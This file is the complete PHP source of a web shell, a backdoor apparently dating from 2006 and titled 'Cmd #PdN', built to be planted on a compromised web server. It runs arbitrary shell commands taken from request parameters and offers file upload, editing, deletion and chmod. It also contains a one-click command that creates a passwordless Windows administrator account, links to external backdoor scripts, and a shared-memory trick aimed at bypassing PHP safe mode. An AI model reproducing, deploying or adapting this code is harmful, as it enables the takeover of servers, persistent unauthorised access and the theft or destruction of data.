<head>
<meta http-equiv="Content-Language" content="pt-br">
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Cmd #PdN</title>
<style type="text/css">
A:link {text-decoration:none}
A:visited {text-decoration:none}
A:hover {text-decoration:underline}
A:active {text-decoration:underline}
</style>
</head>
<body style="font-family: Tahoma; font-size: 10px">
<?php
@set_time_limit(0);
$string = $_SERVER['QUERY_STRING'];
$mhost = 'http://www.Vel0zBR.xpg.com.br/Owner?';
$host_all = explode("$mhost", $string);
$s1 = $host_all[0];
$fstring = $_SERVER['PHP_SELF']."?".$s1.$mhost;
$OS = @PHP_OS;
$IpServer = '127.0.0.1';
$UNAME = @php_uname();
$PHPv = @phpversion();
$SafeMode = @ini_get('safe_mode');
if ($SafeMode == '') { $SafeMode = "<i>OFF</i>"; }
else { $SafeMode = "<i>$SafeMode</i>"; }
$btname = 'backtool.txt';
$bt = 'http://www.expcode.com/exp/r0nin.expcode';
$dc = 'http://www.expcode.com/exp/dc.pl';
$newuser = '@echo off;net user Admin /add /expires:never /passwordreq:no;net localgroup "Administrators" /add Admin;net localgroup "Users" /del Admin';
// Java Script
echo "<script type=\"text/javascript\">";
echo "function ChMod(chdir, file) {";
echo "var o = prompt('Chmod: - Exemple: 0777', '');";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=chmod&chdir=' + chdir + '&file=' + file + '&chmod=' + o + \"\";";
echo "}";
echo "}";
echo "function Rename(chdir, file, mode) {";
echo "if (mode == 'edit') {";
echo "var o = prompt('Rename file '+ file + ' for:', '');";
echo "}";
echo "else {";
echo "var o = prompt('Rename dir '+ file + ' for:', '');";
echo "}";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=rename&chdir=' + chdir + '&file=' + file + '&newname=' + o + '&mode=' + mode +\"\";";
echo "}";
echo "}";
echo "function Copy(chdir, file) {";
echo "var o = prompt('Copied for:', '/tmp/' + file);";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=copy&chdir=' + chdir + '&file=' + file + '&fcopy=' + o + \"\";";
echo "}";
echo "}";
echo "function Mkdir(chdir) {";
echo "var o = prompt('Which name?', 'NewDir');";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=mkdir&chdir=' + chdir + '&newdir=' + o + \"\";";
echo "}";
echo "}";
echo "function Newfile(chdir) {";
echo "var o = prompt('Which name?', 'NewFile.txt');";
echo "if (o) {";
echo "window.location=\"\" + '{$fstring}&action=newfile&chdir=' + chdir + '&newfile=' + o + \"\";";
echo "}";
echo "}";
echo "</script>";
// End JavaScript
/* Functions */
function cmd($CMDs) {
$CMD[1] = '';
exec($CMDs, $CMD[1]);
if (empty($CMD[1])) {
$CMD[1] = shell_exec($CMDs);
}
elseif (empty($CMD[1])) {
$CMD[1] = passthru($CMDs);
}
elseif (empty($CMD[1])) {
$CMD[1] = system($CMDs);
}
elseif (empty($CMD[1])) {
$handle = popen($CMDs, 'r');
while(!feof($handle)) {
$CMD[1][] .= fgets($handle);
}
pclose($handle);
}
return $CMD[1];
}
if (@$_GET['chdir']) {
$chdir = $_GET['chdir'];
} else {
$chdir = getcwd()."/";
}
if (@chdir("$chdir")) {
$msg = "<font color=\"#008000\">Entrance in the directory, OK!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error to enters it in the directory!</font>";
$chdir = str_replace($SCRIPT_NAME, "", $_SERVER['SCRIPT_NAME']);
}
$chdir = str_replace(chr(92), chr(47), $chdir);
if (@$_GET['action'] == 'upload') {
$uploaddir = $chdir;
$uploadfile = $uploaddir. $_FILES['userfile']['name'];
if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $_FILES['userfile']['name'])) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$_FILES['userfile']['name']}</font>, the archive is validates and was loaded successfully.</font>";
} else {
$msg = "<font color=\"#FF0000\">Error when copying archive.</font>";
}
}
elseif (@$_GET['action'] == 'mkdir') {
$newdir = $_GET['newdir'];
if (@mkdir("$chdir"."$newdir")) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$newdir}</font>, directory created successfully.</font>";
} else {
$msg = "<font color=\"#FF0000\">Error to it creates directory.</font>";
}
}
elseif (@$_GET['action'] == 'newfile') {
$newfile = $_GET['newfile'];
if (@touch("$chdir"."$newfile")) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$newfile}</font>, created successfully!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error to tries it creates archive.</font>";
}
}
elseif (@$_GET['action'] == 'del') {
$file = $_GET['file']; $type = $_GET['type'];
if ($type == 'file') {
if (@unlink("$chdir"."$file")) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$file}</font>, successfully excluded archive!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error to it I excluded archive!</font>";
}
} elseif ($type == 'dir') {
if (@rmdir("$chdir"."$file")) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$file}</font>, successfully excluded directory!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error to it I excluded directory!</font>";
}
}
}
elseif (@$_GET['action'] == 'chmod') {
$file = $chdir.$_GET['file']; $chmod = $_GET['chmod'];
if (@chmod ("$file", $chmod)) {
$msg = "<font color=\"#008000\">Chmod of</font> <font color=\"#000080\">{$_GET['file']}</font> <font color=\"#008000\">moved for</font> <font color=\"#000080\">$chmod</font> <font color=\"#008000\">successfully.</font>";
} else {
$msg = '<font color=\"#FF0000\">Error when moving chmod.</font>';
}
}
elseif (@$_GET['action'] == 'rename') {
$file = $_GET['file']; $newname = $_GET['newname'];
if (@rename("$chdir"."$file", "$chdir"."$newname")) {
$msg = "<font color=\"#008000\">Archive</font> <font color=\"#000080\">{$file}</font> <font color=\"#008000\">named for</font> <font color=\"#000080\">{$newname}</font> <font color=\"#008000\">successfully!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error to it nominates archive.</font>";
}
}
elseif (@$_GET['action'] == 'copy') {
$file = $chdir.$_GET['file']; $copy = $_GET['fcopy'];
if (@copy("$file", "$copy")) {
$msg = "<font color=\"#000080\">{$file}</font>, <font color=\"#008000\">copied for</font> <font color=\"#000080\">{$copy}</font> <font color=\"#008000\">successfully!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error when copying</font> <font color=\"#000000\">{$file}</font> <font color=\"#FF0000\">for</font> <font color=\"#000000\">{$copy}</font>";
}
}
/* Parte Atualiza 02:48 12/2/2006 */
elseif (@$_GET['action'] == 'cmd') {
if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; }
if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; }
$cmd = stripslashes(trim($cmd));
$result_arr = cmd($cmd);
$afim = count($result_arr); $acom = 0; $msg = '';
$msg .= "<p style=\"color: #000000;text-align: center;font-family: 'Lucida Console';font-size: 12px;margin 2\">Results: <b>".$cmd."</b></p>";
if ($result_arr) {
while ($acom <= $afim) {
$msg .= "<p style=\"color: #008000;text-align: left;font-family: 'Lucida Console';font-size: 12px;margin 2\"> ".@$result_arr[$acom]."</p>";
$acom++;
}
}
else {
$msg .= "<p style=\"color: #FF0000;text-align: center;font-family: 'Lucida Console';font-size: 12px;margin 2\">Erro ao executar comando.</p>";
}
}
elseif (@$_GET['action'] == 'safemode') {
if (@!extension_loaded('shmop')) {
echo "Loading... module";
if (strtoupper(substr(PHP_OS, 0,3) == 'WIN')) {
@dl('php_shmop.dll');
} else {
@dl('shmop.so');
}
}
if (@extension_loaded('shmop')) {
echo "Module: <b>shmop</b> loaded!";
$shm_id = @shmop_open(0xff2, "c", 0644, 100);
if (!$shm_id) { echo "Couldn't create shared memory segment\n"; }
$data="\x00";
$offset=-3842685;
$shm_bytes_written = @shmop_write($shm_id, $data, $offset);
if ($shm_bytes_written != strlen($data)) { echo "Couldn't write the entire length of data\n"; }
if (!shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for deletion."; }
echo passthru("id");
shmop_close($shm_id);
} else { echo "Module: <b>shmop</b> not loaded!"; }
}
elseif (@$_GET['action'] == 'zipen') {
$file = $_GET['file'];
$zip = @zip_open("$chdir"."$file");
$msg = '';
if ($zip) {
while ($zip_entry = zip_read($zip)) {
$msg .= "Name: " . zip_entry_name($zip_entry) . "\n";
$msg .= "Actual Filesize: " . zip_entry_filesize($zip_entry) . "\n";
$msg .= "Compressed Size: " . zip_entry_compressedsize($zip_entry) . "\n";
$msg .= "Compression Method: " . zip_entry_compressionmethod($zip_entry) . "\n";
if (zip_entry_open($zip, $zip_entry, "r")) {
echo "File Contents:\n";
$buf = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry));
echo "$buf\n";
zip_entry_close($zip_entry);
}
echo "\n";
}
zip_close($zip);
}
}
elseif (@$_GET['action'] == 'edit') {
$file = $_GET['file'];
$conteudo = '';
$filename = "$chdir"."$file";
$conteudo = @file_get_contents($filename);
$conteudo = htmlspecialchars($conteudo);
$back = $_SERVER['HTTP_REFERER'];
echo "<p align=\"center\">Editing {$file} ...</p>";
echo "<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse: collapse\" width=\"100%\" id=\"editacao\">";
echo "<tr>";
echo "<td width=\"100%\">";
echo "<form method=\"POST\" action=\"{$fstring}&action=save&chdir={$chdir}&file={$file}\">";
echo "<!--webbot bot=\"SaveResults\" u-file=\"_private/form_results.csv\" s-format=\"TEXT/CSV\" s-label-fields=\"TRUE\" --><p align=\"center\">";
print "<textarea rows=\"18\" name=\"S1\" cols=\"89\" style=\"font-family: Verdana; font-size: 10pt; border: 1px solid #000000\">{$conteudo}</textarea></p>";
echo "<p align=\"center\">";
echo "<input type=\"submit\" value=\"Save\" name=\"B2\" style=\"font-family: Tahoma; font-size: 10px; border: 1px solid #000000\"> ";
echo "<input type=\"button\" value=\"Closes Publisher\" Onclick=\"javascript:window.location='{$fstring}&chdir={$chdir}'\" name=\"B1\" style=\"font-family: Tahoma; font-size: 10px; border: 1px solid #000000\"> ";
echo "</form>";
echo "</td>";
echo "</tr>";
echo "</table>";
}
elseif (@$_GET['action'] == 'save') {
$filename = "$chdir".$_GET['file'];
$somecontent = $_POST['S1'];
$somecontent = stripslashes(trim($somecontent));
if (is_writable($filename)) {
@$handle = fopen ($filename, "w");
@$fw = fwrite($handle, $somecontent);
@fclose($handle);
if ($handle && $fw) {
$msg = "<font color=\"#000080\">{$_GET['file']}</font>, <font color=\"#008000\">edited successfully!</font>";
}
} else {
$msg = "<font color=\"#000000\">{$_GET['file']},</font> <font color=\"#FF0000\">cannot be written!</font>";
}
}
// Informações
$cmdget = '';
if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; }
if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; }
$cmdget = htmlspecialchars($cmdget);
function asdads() {
$asdads = '';
if (@file_exists("/usr/bin/wget")) { $asdads .= "wget "; }
if (@file_exists("/usr/bin/fetch")) { $asdads .= "fetch "; }
if (@file_exists("/usr/bin/curl")) { $asdads .= "curl "; }
if (@file_exists("/usr/bin/GET")) { $asdads .= "GET "; }
if (@file_exists("/usr/bin/lynx")) { $asdads .= "lynx "; }
return $asdads;
}
echo "<form method=\"POST\" name=\"cmd\" action=\"{$fstring}&action=cmd&chdir=$chdir\">";
echo "<fieldset style=\"border: 1px solid #000000; padding: 2\">";
echo "<legend>Informações cmd ripped by corey</legend>";
echo "<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse: collapse; font-family: Tahoma; font-size: 10px\" width=\"100%\">";
echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>Sistema:</b> </td></p>";
echo "<td width=\"92%\"> {$OS}</td>";
echo "</tr>";
echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>Uname: </b></td></p>";
echo "<td width=\"92%\"> {$UNAME}</td>";
echo "</tr>";
echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>PHP: </b></td></p>";
echo "<td width=\"92%\"> {$PHPv}, <b>safe mode:</b> {$SafeMode}</td>";
echo "</tr>";
if (strtoupper(substr($OS, 0,3) != 'WIN')) {
$Methods = asdads();
if ($Methods == '') { $Methods = "???"; }
echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>Methods: </b></td></p>";
echo "<td width=\"92%\"> {$Methods}</td>";
echo "</tr>";
}
echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>Ip: </b></td></p>";
echo "<td width=\"92%\"> {$IpServer}</td>";
echo "</tr>";
echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>Command: </b></td></p>";
echo "<td width=\"92%\"> <input type=\"text\" size=\"70\" name=\"cmd\" value=\"{$cmdget}\" style=\"font-family: Tahoma; font-size: 10 px; border: 1px solid #000000\"> <input type=\"submit\" name=\"action\" value=\"Send\" style=\"font-family: Tahoma; font-size: 10 px; border: 1px solid #000000\"></td>";
echo "</tr>";
echo "</table>";
echo "</fieldset></form>";
// Dir
echo "<form method=\"POST\" action=\"{$fstring}&action=upload&chdir=$chdir\" enctype=\"multipart/form-data\">";
echo "<!--webbot bot=\"FileUpload\" u-file=\"_private/form_results.csv\" s-format=\"TEXT/CSV\" s-label-fields=\"TRUE\" --><fieldset style=\"border: 1px solid #000000; padding: 2\">";
if (is_writable("$chdir")) {
if (strtoupper(substr($OS, 0,3) == 'WIN')) {
echo "<legend>Dir <b>YES</b>: {$chdir} - <a href=\"#[New Dir]\" οnclick=\"Mkdir('{$chdir}');\">[New Dir]</a> <a href=\"#[New File]\" οnclick=\"Newfile('{$chdir}')\">[New File]</a> <a href=\"{$fstring}&action=cmd&chdir={$chdir}&cmd=$newuser\">[Remote Access]</a></legend>";
} else {
echo "<legend>Dir <b>YES</b>: {$chdir} - <a href=\"#[New Dir]\" οnclick=\"Mkdir('{$chdir}');\">[New Dir]</a> <a href=\"#[New File]\" οnclick=\"Newfile('{$chdir}')\">[New File]</a> <a href=\"{$fstring}&action=backtool&chdir={$chdir}&write=yes\">[BackTool]</a></legend>";
}
}
else {
if (strtoupper(substr($OS, 0,3) == 'WIN')) {
echo "<legend>Dir NO: {$chdir} - <a href=\"#[New Dir]\" οnclick=\"Mkdir('{$chdir}');\">[New Dir]</a> <a href=\"#[New File]\" οnclick=\"Newfile('{$chdir}')\">[New File]</a> <a href=\"{$fstring}&action=cmd&chdir={$chdir}&cmd={$newuser}\">[Remote Access]</a></legend>";
} else {
echo "<legend>Dir NO: {$chdir} - <a href=\"#[New Dir]\" οnclick=\"Mkdir('{$chdir}');\">[New Dir]</a> <a href=\"#[New File]\" οnclick=\"Newfile('{$chdir}')\">[New File]</a> <a href=\"{$fstring}&action=backtool&chdir={$chdir}&write=no\">[BackTool]</a></legend>";
}
}
if (@!$handle = opendir("$chdir")) {
echo " I could not enters in the directory, <a href=\"{$fstring}\">click here!</a> for return to the original directory!";
}
else {
echo " <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse: collapse; font-family: Tahoma; font-size: 10px\" width=\"100%\">";
echo " <tr>";
echo " <td width=\"100%\" style=\"font-family: Tahoma; font-size: 10px\" colspan=\"4\"> Upload:";
echo " <input type=\"file\" name=\"userfile\" size=\"91\" style=\"font-family: Tahoma; font-size: 10px; border-style: solid; border-width: 1\">";
echo " <input type=\"submit\" value=\"Send\" name=\"B1\" style=\"font-family: Tahoma; font-size: 10px; border: 1px solid #000000\"></td>";
echo " </tr>";
echo " <tr>";
echo " <td width=\"100%\" style=\"font-family: Tahoma; font-size: 10px\" colspan=\"4\"> </td>";
echo " </tr>";
echo " <tr>";
echo " <td width=\"100%\" style=\"font-family: Tahoma; font-size: 10px\" colspan=\"4\">";
if (@!$msg) {
echo " <p align=\"left\">Messages</td>";
} else {
echo " <p align=\"left\">$msg</td>";
}
echo " </tr>";
echo " <tr>";
echo " <td width=\"100%\" colspan=\"4\"> </td>";
echo " </tr>";
echo " <tr>";
echo " <td width=\"9%\"> Perms</td>";
echo " <td width=\"49%\"> File </td>";
echo " <td width=\"10%\"> Size </td>";
echo " <td width=\"32%\"> Commands</td>";
echo " </tr>";
$colorn = 0;
while (false !== ($file = readdir($handle))) {
if ($file != '.') {
if ($colorn == 0) {
$color = "style=\"background-color: #FFCC66\"";
}
elseif ($colorn == 1) {
$color = "style=\"background-color: #C0C0C0\"";
}
if (@is_dir("$chdir"."$file")) {
$file = $file.'/';
$mode = 'chdir';
} else {
$mode = 'edit';
}
if (@substr("$chdir", strlen($chdir) -1, 1) != '/') {
$chdir .= '/';
}
if ($file == '../') {
$lenpath = strlen($chdir); $baras = 0;
for ($i = 0;$i < $lenpath;$i++) { if ($chdir{$i} == '/') { $baras++; } }
$chdir_ = explode("/", $chdir);
$chdirpox = str_replace($chdir_[$baras-1].'/', "", $chdir);
}
$perms = @fileperms ("$chdir"."$file");
if ($perms == '') {
$perms = '???';
}
$size = @filesize ("$chdir"."$file");
$size = $size / 1024;
$size = explode(".", $size);
if (@$size[1] != '') {
$size = $size[0].'.'.@substr("$size[1]", 0, 2);
} else {
$size = $size[0];
}
if ($size == 0) {
if ($mode == 'chdir') {
$size = '???';
}
}
echo "<tr>";
echo "<td width=\"9%\" $color> $perms</td>";
if (@is_writable ("$chdir"."$file")) {
if ($mode == 'chdir') {
if ($file == '../') {
echo "<td width=\"49%\" $color> <b><a href=\"{$fstring}&chdir=$chdirpox\">$file</a></b></td>";
} else {
echo "<td width=\"49%\" $color> <b><a href=\"{$fstring}&chdir={$chdir}{$file}\">$file</a></b></td>";
}
} else {
if (is_readable("$chdir"."$file")) {
echo "<td width=\"49%\" $color> <b><a href=\"{$fstring}&action=edit&chdir=$chdir&file=$file\">$file</a></b></td>";
} else {
echo "<td width=\"49%\" $color> <b>$file</b></td>";
}
}
}
else {
if ($mode == 'chdir') {
if ($file == '../') {
echo "<td width=\"49%\" $color> <a href=\"{$fstring}&chdir=$chdirpox\">$file</a></td>";
} else {
echo "<td width=\"49%\" $color> <a href=\"{$fstring}&chdir={$chdir}{$file}\">$file</a></td>";
}
} else {
if (@is_readable("$chdir"."$file")) {
echo "<td width=\"49%\" $color> <a href=\"{$fstring}&action=edit&chdir=$chdir&file=$file\">$file</a></td>";
} else {
echo "<td width=\"49%\" $color> $file</td>";
}
}
}
echo "<td width=\"10%\" $color> $size KB</td>";
if ($mode == 'edit') {
echo "<td width=\"32%\" $color> <a href=\"#{$file}\" οnclick=\"Rename('{$chdir}', '{$file}', '{$mode}')\">[Rename]</a> <a href=\"{$fstring}&action=del&chdir={$chdir}&file={$file}&type=file\">[Del]</a> <a href=\"#{$file}\" οnclick=\"ChMod('$chdir', '$file')\">[Chmod]</a> <a href=\"#{$file}\" οnclick=\"Copy('{$chdir}', '{$file}')\">[Copy]</a></td>";
} else {
echo "<td width=\"32%\" $color> <a href=\"#{$file}\" οnclick=\"Rename('{$chdir}', '{$file}', '{$mode}')\">[Rename]</a> <a href=\"{$fstring}&action=del&chdir={$chdir}&file={$file}&type=dir\">[Del]</a> <a href=\"#{$file}\" οnclick=\"ChMod('$chdir', '$file')\">[Chmod]</a> [Copy]</td>";
}
echo "</tr>";
if ($colorn == 0) {
$colorn = 1;
}
elseif ($colorn == 1) {
$colorn = 0;
}
}
}
closedir($handle);
}
?>
</table>
</fieldset></form>
</body>
</html>